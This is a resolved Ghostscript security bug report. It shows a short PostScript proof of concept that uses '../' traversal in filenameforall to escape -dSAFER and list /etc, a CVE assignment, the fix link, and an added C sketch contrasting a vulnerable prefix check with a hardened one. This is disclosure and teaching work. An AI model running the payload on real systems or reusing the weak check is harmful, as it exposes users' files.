Bug 698676 - Bypass -dSAFER in filenameforall command
Status: RESOLVED FIXED
Product: Ghostscript
Classification: Unclassified
Component: Security (public)
Version: unspecified
Hardware: PC Linux
Importance: P4 normal
Assignee: Chris Liddell (chrisl)
QA Contact: gs-security
Reported: 2017-10-19 13:11 UTC by Jasper Yu
Modified: 2019-05-08 13:44 UTC


Attachments
the script run with ghostscript 9.22 (191.32 KB, image/png)
2017-10-19 13:11 UTC, Jasper Yu

Description Jasper Yu 2017-10-19 13:11:59 UTC
Created attachment 14403
the script run with ghostscript 9.22

CVE-2013-5653 fixed the issue where filenameforall can ignore -dSAFER and list the files.
But still, there are some ways to bypass it.

%!PS
(/usr/share/fonts/../../../../../../../../etc/*) {print (\n) print} 1024 string filenameforall
quit

Is it possible to request a CVE ID?
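
Added illustration (not part of the report, and not Ghostscript's code or the fix in the linked commit): the pattern above starts inside a font directory and climbs out of it with "../". The C sketch below assumes a permission check that compares the raw string against a permitted prefix and contrasts it with one that reduces the path first; PERMITTED, naive_permitted, reduce_path and safe_permitted are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical permitted prefix, chosen to match the path in the report. */
static const char *PERMITTED = "/usr/share/fonts/";

/* Assumed weak check: compares the raw, unreduced string to the prefix. */
int naive_permitted(const char *path) {
    return strncmp(path, PERMITTED, strlen(PERMITTED)) == 0;
}

/* Lexically reduce an absolute path: skip "." and empty components, and let
 * ".." drop the previous component (stopping at the root). Symlinks are not
 * resolved. Returns 0 on success, -1 for a relative or oversized path. */
int reduce_path(const char *in, char *out, size_t outsz) {
    size_t len = 0;
    if (in[0] != '/' || outsz < 2) return -1;
    while (*in) {
        while (*in == '/') in++;
        size_t n = strcspn(in, "/");
        if (n == 0) break;
        if (n == 2 && in[0] == '.' && in[1] == '.') {
            while (len > 0 && out[--len] != '/') { }  /* pop one component */
        } else if (!(n == 1 && in[0] == '.')) {
            if (len + n + 2 > outsz) return -1;       /* '/' + name + NUL */
            out[len++] = '/';
            memcpy(out + len, in, n);
            len += n;
        }
        in += n;
    }
    if (len == 0) out[len++] = '/';
    out[len] = '\0';
    return 0;
}

/* Hardened check: reduce first, fail closed, then compare to the prefix. */
int safe_permitted(const char *path) {
    char buf[1024];
    if (reduce_path(path, buf, sizeof buf) != 0) return 0;
    return naive_permitted(buf);
}

int main(void) {
    /* The pattern from the report. */
    const char *p = "/usr/share/fonts/../../../../../../../../etc/*";
    printf("naive: %d  hardened: %d\n", naive_permitted(p), safe_permitted(p));
    return 0;
}
```

Lexical reduction does not cover symlinks inside a permitted directory; a check that must hold against those has to resolve the path on the filesystem before comparing.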
Comment 1 Jasper Yu 2017-10-19 20:43:05 UTC
I just requested a CVE number from MITRE, and the following was assigned.

Please use this CVE as reference in patching or info dissemination related to this particular issue.

CVE-2017-15652

Thanks
Comment 2 Chris Liddell (chrisl) 2017-10-20 08:09:25 UTC
Fixed in:
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=2fc463d0e


Thanks for the report!